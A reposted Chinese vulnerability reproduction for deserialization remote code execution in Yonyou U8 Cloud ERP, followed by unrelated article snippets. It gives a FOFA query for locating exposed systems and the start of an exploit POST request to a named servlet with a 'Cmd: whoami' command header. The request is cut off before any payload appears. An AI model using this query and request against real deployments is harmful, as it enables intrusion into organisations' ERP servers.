用友U8 Cloud 多处反序列化RCE漏洞复现

0x01 产品简介

用友U8 Cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型企业,提供企业级云ERP整体解决方案。

0x02 漏洞概述

用友U8 Cloud存在多处(TableInputOperServlet、LoginServlet 、FileTransportServlet、CacheInvokeServlet、ActionHandlerServlet、ServletCommander、MxServlet 、MonitorServlet、LoggingConfigServlet、ClientRequestDispatch)反序列化漏洞,系统未将用户传入的序列化数据进行过滤就直接执行反序列化操作,结合系统本身存在的反序列化利用链,最终造成远程代码执行。

0x03 影响范围

所有版本

0x04 复现环境

FOFA:app="用友-U8-Cloud"

0x05 漏洞复现

Exp-1(TableInputOperServlet)

POST /service/~iufo/com.ufsoft.iuforeport.tableinput.TableInputOperServlet HTTP/1.1
Host: your-ip
Cmd: whoami
Accep

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/263174.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

LeetCode力扣每日一题(Java):27、移除元素

一、题目 二、解题思路 1、我的思路 因为题目中说“元素的顺序可以改变。你不需要考虑数组中超出新长度后面的元素。”也就是说: 输入:nums [3,2,2,3], val 3 输出:2, nums [2,2] 解释:函数应该返回新的长度 2并且 nums 中的…

JavaEE 09 锁策略

1.锁策略 1.1 乐观锁与悲观锁 其实前三个锁是同一种锁,只是站在不同的角度上去进行描述,此处的乐观与悲观其实是指在预测的角度上看会发生锁竞争的概率大小,概率大的则是悲观锁,概率小的则是乐观锁 乐观锁在加锁的时候就会做较少的事情,加锁的速度较快,但是消耗的cpu资源等也会…

机器人纯阻抗控制接触刚性环境(阻尼影响因素)

问题描述 在机器人学中,阻抗控制是一种常用的控制策略,用于管理机器人在与环境交互时的运动和力。阻抗控制背后的关键概念是将环境视为导纳,而将机器人视为阻抗。 纯阻抗控制接触刚性环境时,机器人的行为方式主要受其阻抗参数的…

Linux虚拟机ipaddr/ifconfig不显示IP的解决方法(亲测有效)

目录 问题描述激活网卡插网线的情况连Wifi的情况静态ip 问题描述 有时候经常会出现之前明明好的,但是换了个网络就查不到ip了,由于不知道原因,有的人会选择重装虚拟机,还有的人开始崩溃,甚至于自疑,到底谁…

Kubernetes(K8S)

Kubernetes是一种容器编排平台,可以自动化部署、扩展和管理容器化应用程序。用于管理云平台中多个主机上的容器化的应用,从而使得应用程序可以更加灵活和可靠。 Kubernetes是一个开源项目,由Google维护。它是目前最受欢迎的容器编排平台之一&…

[Linux] nginx防盗链与优化

一、Nginx的页面优化 1.1 Nginx的网页压缩 在Nginx的ngx_http_gzip_module压缩模块提供对文件内容压缩的功能。进行相关的配置修改,就能实现Nginx页面的压缩,达到节约带宽,提升用户访问速度 vim /usr/local/nginx/conf/nginx.conf http { .…

windows下dmPython操作达梦数据库环境配置

文章目录 windows下dmPython操作达梦数据库代码示例安装达梦库编译文件拷贝文件调试代码参考文献 windows下dmPython操作达梦数据库代码示例 安装达梦库 下载DM8版本 https://www.dameng.com/DM8.html 配置环境变量 编译文件 进入dmPython的官方安装源,如我的目…

vue3中的v-model语法糖

Vue2的v-model默认解析成 :value 与 input Vue3的 V-model 默认解析成 :modelValue 与 update:modelValue vue3中只需要 v-model 指令可以支持对个数据在父子组件同步,不再支持 .sync 语法 vue3 中 v-model 语法糖 :modelValue"count" 和 update:modelVal…

初识指针数组、数组指针

声明:学习过程中的笔记,不足之处请指教 两者的含义 指针数组:int* arr[10]; 用来存放指针的数组。 解释: arr 先与“[ ]”结合,构成一个数组的定义,数组名为 arr。 如果搞不清楚运算符的优先级,那么就加上小括号…

Botton进一步了解(点击事件)

点击事件和长按事件 监听器:专门监听控件的动作行为。只有控件发生了指定的动作,监听器才会触发开关区执行对应的代码逻辑。按钮控件有两种常用的监听器: 点击监听器:通过setOnClickListener方法设置。按钮被按住少于500ms时会触…

7/100 盛最多水的容器 8/100整数转罗马数字 9/100罗马数字转整数

题目:盛最多水的容器 给定一个长度为 n 的整数数组 height 。有 n 条垂线,第 i 条线的两个端点是 (i, 0) 和 (i, height[i]) 。 找出其中的两条线,使得它们与 x 轴共同构成的容器可以容纳最多的水。 返回容器可以储存的最大水量。 说明&a…

CDN 内容分发网络

CDN常见问题 什么是 CDN ? CDN 全称是 Content Delivery Network/Content Distribution Network,翻译过的意思是 内容分发网络 。 我们可以将内容分发网络拆开来看: 内容:指的是静态资源比如图片、视频、文档、JS、CSS、HTML。…